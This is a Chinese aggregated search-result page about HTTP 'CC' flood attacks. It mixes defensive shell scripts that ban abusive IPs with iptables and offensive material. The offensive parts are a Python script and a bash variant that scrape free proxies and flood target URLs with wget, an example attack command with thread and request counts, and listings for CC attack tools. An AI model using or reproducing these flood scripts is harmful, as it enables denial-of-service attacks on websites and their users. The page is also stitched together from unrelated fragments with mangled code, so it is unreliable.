精华内容
下载资源
问答
  • LINUX/CentOS防CC攻击脚本
    2021-05-11 13:41:05

    #!/bin/sh

    cd /var/log/httpd/

    cat access_log|awk '{print $1}'|sort|uniq -c|sort -n -r|head -n 20 > a

    cp /dev/null access_log

    cp /dev/null error_log

    cp /dev/null limit.sh

    cp /dev/null c

    #awk '{print $2}' a|awk -F. '{print $1"."$2"."$3}'|sort|uniq > b

    cat a|while read num ip

    do

    if [ "$num" -gt "20" ]

    then

    echo $ip >> c

    fi

    done

    cat c|awk -F. '{print $1"."$2"."$3}'|sort|uniq > b

    #cat c|sort|uniq > b

    for i in `cat b`

    #cat b|sed 's/\./ /g'|while read i1 i2 i3 i4

    do

    if `cat ourip |grep $i > /dev/null 2>&1`

    then

    echo "`date` $i" >> test

    else

    echo "iptables -I INPUT -p tcp -dport 80 -s $i.0/24 -j DROP" >> limit.sh

    fi

    done

    sh limit.sh

    更多相关内容
  • 实现代码: 代码如下:#!/bin/shcd /var/log/httpd/cat access_log|awk ‘{print $1}’|sort|uniq -c|sort -n -r|head -n 20 > acp /dev/null access_logcp /dev/null error_logcp /dev/null limit.shcp /dev/null ...
  • CC攻击python脚本

    2019-09-16 14:22:37
    脚本是用于提供CC攻击测试的脚本,用python编写,对于希望通过代码进行测试的同学可以借鉴。
  • 防止cc攻击监控脚本

    2018-10-08 17:19:51
    C攻击是DDOS(分布式拒绝服务)的一种,相比其它的DDOS攻击CC似乎更有技术含量一些。这种攻击你见不到虚假IP,见不到特别大的异常流量,但造成...因此,大家有必要了解CC攻击的原理及如果发现CC攻击和对其的防范措施。
  • 前天没事写了一个防CC攻击的Shell脚本,没想到这么快就要用上了,原因是因为360网站卫士的缓存黑名单突然无法过滤后台,导致WordPress无法登录!虽然,可以通过修改本地hosts文件来解决这个问题,但是还是想暂时取消...
  • ⑤、对于白名单过滤,只要将白名单 IP 保存到脚本同一目录下的 white_ip.txt 文件中即可,若发现攻击 IP 在白名单中,脚本不会直接拉黑,而是发一封邮件给你,让你自己判断这个白名单攻击你是为毛?如果白名单需要...
  • Linux CC攻击脚本

    千次阅读 2020-05-02 23:41:55
    Linux CC攻击脚本 CC(ChallengeCollapsar)主要是用来攻击页面的。大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,访问的人越多,论坛的页面越多,数据库就...

    Linux CC攻击脚本
    CC(ChallengeCollapsar)主要是用来攻击页面的。大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,访问的人越多,论坛的页面越多,数据库就越大,被访问的频率也越高,占用的系统资源也就相当可观。

    最近在做一些防CC的措施,想验证效果就的有类似CC的攻击,所以写了个Python脚本来模拟CC攻击,其原理很简单,就是去网络上拉取一下渣渣代理,然后通过代理去访问服务器,成本低的吓人,但影响却不小…代码如下(该脚本只能用于交流学习,一切因该脚本产生的不良后果,与我无关):

    Python

    #!/usr/bin/python
    #-------------------------------------------------------------------------------

    Name: CC.py

    Author: LiuSha

    Created: 1/07/2014

    Email: itchenyi@gmail.com

    #-------------------------------------------------------------------------------

    import urllib2
    import re
    import os
    import threading
    import time
    import random

    class RunCC(threading.Thread):
    def init(self,proxy,url):
    threading.Thread.init(self)
    self.thread_proxy = proxy
    self.thread_url = url
    self.thread_stop = False

    def run(self):
        while not self.thread_stop:
            os.system("""wget --ignore-length --cache=off --no-http-keep-alive -t 1 --referer="http://www.10086.com" -U 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' -e "http_proxy=http://%s/" "%s" &"""%(self.thread_proxy,self.thread_url))
    def stop(self):
        self.thread_stop = True
    

    def get_stock_html(URL):
    opener = urllib2.build_opener(
    urllib2.HTTPRedirectHandler(),
    urllib2.HTTPHandler(debuglevel=0),
    )
    opener.addheaders = [
    (‘User-agent’,
    ‘Mozilla/4.0 (compatible;MSIE 7.0;’
    ‘Windows NT 5.1; .NET CLR 2.0.50727;’
    ‘.NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)’)
    ]
    url = “http://proxy.com.ru/%s”%URL
    response = opener.open(url)
    return ‘’.join(response.readlines())

    def Getting_Url():
    global CC_Url
    file = open(‘url’,‘r’)
    CC_Url = file.readlines()
    file.close()

    def Getting_list():
    global IP_Port
    IP_Port = []
    for html_list in re.findall(‘list_\d+.html’,get_stock_html(“list_1.html”)):
    print “getting %s’s IP:PORT”%html_list
    IP_Port += eval(re.sub(’’,’:’,"%s"%re.findall(’\d+.\d+.\d+.\d+\d+’,get_stock_html(html_list))))

    def main():
    global CC_Dict
    CC_Dict = {}
    for i_name in range(len(IP_Port)):
    CC_Dict[‘Thread%s’%i_name] = “RunCC(’%s’,r’’’%s’’’)”%(IP_Port[i_name],random.choice(CC_Url))
    for k,v in CC_Dict.items():
    k = eval(v)
    k.start()
    time.sleep(0.6)
    k.stop()

    if name == ‘main’:
    Getting_Url()
    Getting_list()
    main()

    使用方法:
    Python

    ###url 文件一行一个url不嫌多###
    [root@test-CC CC]# cat url
    http://www.ipython.me/about-me
    http://www.ipython.me/
    ###直接运行###
    [root@test-CC CC]# python cc.py

    勇敢的大飞哥也用shell 粗暴的写了一个出来,代码如下:
    Python

    #!/bin/sh
    #Email:zhengxiaofeiccc@139.com
    url=$1
    page_number=curl http://proxy.com.ru |grep -o "list_.*html"|awk -F "'" '{print $NF}'|tail -1|grep -o \[0-9\]*

    for i in seq 1 $page_number
    do
    curl http://proxy.com.ru/list_$i.html|egrep -o “[[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*[0-9]{2,4}”|awk -F “<|>” ‘{print 1 , 1, 1,NF}’ >> ip.txt
    done

    while read ip port
    do
    wget -b --cache=off --ignore-length --referer=“http://www.10086.com” -U ‘Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)’
    -Y on -e “http_proxy=http:// i p : ip: ip:port/” “$url”
    done < ip.txt

    展开全文
  • CC测压 运行命令行 yum -y install wget && wget https://raw.githubusercontent.com/jxchangliu/changliu/master/cc.sh -O mycc.sh &&chmod 777 mycc.sh && sh mycc.sh 可以一键安装环境,需要centos7以上系统
  • 整个脚本内容如下:#!/bin/shcd /var/log/httpd/cat access_log|awk '{print $1}'|sort|uniq -c|sort -n -r|head -n 20 > acp /dev/null access_logcp /dev/null error_logcp /dev/null limit.shcp /dev/null c#...

    整个脚本内容如下:

    #!/bin/sh

    cd /var/log/httpd/

    cat access_log|awk '{print $1}'|sort|uniq -c|sort -n -r|head -n 20 > a

    cp /dev/null access_log

    cp /dev/null error_log

    cp /dev/null limit.sh

    cp /dev/null c

    #awk '{print $2}' a|awk -F. '{print $1"."$2"."$3}'|sort|uniq > b

    cat a|while read num ip

    do

    if [ "$num" -gt "20" ]

    then

    echo $ip >> c

    fi

    done

    cat c|awk -F. '{print $1"."$2"."$3}'|sort|uniq > b

    #cat c|sort|uniq > b

    for i in `cat b`

    #cat b|sed 's/\./ /g'|while read i1 i2 i3 i4

    do

    if `cat ourip |grep $i > /dev/null 2>&1`

    then

    echo "`date` $i" >> test

    else

    echo "iptables -I INPUT -p tcp -dport 80 -s $i.0/24 -j DROP" >> limit.sh

    fi

    done

    sh limit.sh

    到这里结束

    很简单,就不详细解释了

    展开全文
  • linux上防cc攻击,本脚本配置iptables使用,安装cckiller -i,卸载cckiller -U
  • 本文主要向大家介绍了Linux运维知识之Linux简单处理CC攻击shell脚本,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助。第一个脚本是通过查找日志中访问次数过多的ip,并用iptables屏蔽,600秒解封。#...

    本文主要向大家介绍了Linux运维知识之Linux简单处理CC攻击shell脚本,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助。

    第一个脚本是通过查找日志中访问次数过多的ip,并用iptables屏蔽,600秒解封。

    #!/bin/bash

    btime=600

    attacks=20

    tmpBlockIPFile=/home/tmp_block_ip

    timestamp=$(date +%s)

    logPath="/home/ban.log"

    #start detect bad ip

    badip=`tac /home/www.centos.bz/access.log  | awk '

    BEGIN{

    cmd="date -d \"1 minute ago\" +%H%M%S"

    cmd|getline a

    }

    {

    $4 = substr($4,14,8)

    gsub(":","",$4)

    $4=$4+0

    a=a+0

    if ($4>=a){

    print $1,$7

    } else {

    exit;

    }

    }' | egrep -v '\.(gif|jpg|jpeg|png|css|js)' | awk '{print $1}' | sort | uniq -c | awk -v t="$attacks" '{$1=$1+0;t=t+0;if ($1>=t) print $2}'`

    if [ ! -z "$badip" ];then

    for ip in $badip;

    do

    if test -z "`/sbin/iptables -nL | grep $ip`";then

    /sbin/iptables -I INPUT -s $ip -j DROP

    #record blocked ip

    echo "$timestamp $ip" >> $tmpBlockIPFile

    echo "$(date) $ip" >> $logPath

    fi

    done

    fi

    #unblock ip

    if [ -f "$tmpBlockIPFile" ];then

    ips=""

    while read blockTime ip

    do

    ((interval=$timestamp - $blockTime))

    if [ $interval -gt $btime ];then

    ips="$ips $ip\n"

    fi

    done 

    if [ "$ips" != "" ];then

    for ip in `echo -e $ips`

    do

    sed -i "/$ip/d" $tmpBlockIPFile

    /sbin/iptables -D INPUT -s $ip -j DROP

    done

    fi

    fi

    将此代码保存为ban.sh,加入cronjob使每分钟执行一次。

    此脚本的作用是:利用iptables屏蔽每分钟访问页面超过20的IP,这些页面已经排除图片,css,js等静态文件。

    第二个脚本是通过在日志中查找cc攻击的特征进行屏蔽。

    #!/bin/bash

    keyword="cc-atack"

    badip=`tail -n 5000  /home/www.centos.bz/log/access.log | grep "$keyword"  | awk '{print $1}' | sort | uniq -c | sort -nr | awk '{print $2}'`

    if [ ! -z "$badip" ];then

    for ip in $badip;

    do

    if test -z "`/sbin/iptables -nL | grep $ip`";then

    /sbin/iptables -I INPUT -s $ip -j DROP

    fi

    done

    fi

    keyword则是日志中cc的特征,替换成有效的即可。

    本文由职坐标整理并发布,希望对同学们有所帮助。了解更多详情请关注系统运维Linux频道!

    展开全文
  • cc攻击脚本编写

    千次阅读 2019-09-19 20:20:34
    什么是CC攻击? CC(ChallengeCoHapsar,挑战黑洞)攻击是DDoS攻击的一种类型,使用代理服务器向受害服务器发送大量貌似合法的请求。CC根据其工具命名,攻击者使用代理机制,利用众多广泛可用的免费代理服务器发动DDoS...
  • CCkillerLinux attack defense scripts tool --- Linux CC攻击防御工具脚本请执行如下命令在线安装:curl -ko install.sh https://zhangge.net/wp-content/uploads/files/cckiller/install.sh?ver=1.0.7 &...
  • 宝塔面板CC攻击自动切换5秒盾脚本

    千次阅读 2021-04-30 00:47:45
    下面是编程之家 jb51.cc 通过网络...如果我们的网站遭遇 CC 和 DDoS 攻击时,我们可以用这个方法来简单的防御。不过,Cloudflare 还有一个很经典的功能就是 Cloudflare 经典的 5 秒盾防攻击,我们可以和上一篇文章结...
  • python脚本模拟CC攻击

    千次阅读 2020-09-02 09:02:52
    #!/usr/bin/env python # Author: scott # coding:utf-8 #适用于python2 if __..._ == "__main__": main() exit() #Example : #python cc.py -t 10.12.237.69 -x 50000 -r "350000" #-t:目标;-x:线程;-r:请求数。 
  • 加入到crontab计划任务执行的脚本#!/bin/bash#Author:萧萧一风#Desc:AutoDenyBlack_IPScript.#Date:2019-9-28#取得参数$1为并发阈值,若留空则默认允许单IP最大50并发(实际测试发现,2M带宽,十来个并发服务器就已经...
  • Linux简单处理CC攻击shell脚本#!/bin/bashbtime=600attacks=20tmpBlockIPFile=/home/tmp_block_iptimestamp=$(date +%s)logPath=”/home/ban.log”#start detect bad ipbadip=`tac /home/www.centos.bz/access.log |...
  • 如果我们的网站遭遇CC和DDoS攻击时,我们可以用这个方法来简单的防御。不过,Cloudflare还有一个很经典的功能就是Cloudflare经典的5秒盾防攻击,我们可以和上一篇文章结合起来看,当我们自动拉黑恶意IP到Cloudflare...
  • ROS禁止暴力登录高级防攻击脚本,有效防护任何攻击来源!
  • cc攻击shell脚本

    2020-12-05 12:15:27
    参考文章:http://blog.csdn.net/samxx8/article/details/46897237注意:本人在生产环境中遭遇到cc攻击,连接数过多,cpu负载过大,结果导致服务不可用!shell脚本#!/bin/bash#取得参数$1为并发阈值,若留空则默认...
  • cc攻击源码

    热门讨论 2012-05-26 11:24:55
    cc攻击源码
  • (转自张戈博客)前天没事写了一个防CC攻击的Shell脚本,没想到这么快就要用上了,原因是因为360网站卫士的缓存黑名单突然无法过滤后台,导致WordPress无法登录!虽然,可以通过修改本地hosts文件来解决这个问题,但是...
  • http://www.lvtao.net/shell/478.html
  • 使用socks4 / 5代理攻击http服务器的脚本。 删除了混合代理洪水 新特性: 快速套接字重用 改进的CC模式 随机客户端IP 具体信息: 使用Python3 添加了更多智能选项 Http洪水 Http端口洪水 Http慢速攻击 支持HTTPS Socks...
  • Python-Fuzzing脚本编写

    2020-12-16 07:52:18
    你的时间有限,所以不要为别人而活。不要被教条所限,不要活在别人...—– 乔布斯0X00前言脚本很简单,练练手。站点安装了最新的safe狗,简单搭建了一个注入页面进行注入测试。123456789101112131415161718192021222...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 9,856
精华内容 3,942
关键字:

最新cc攻击脚本

友情链接: JPG2BMPconvert.rar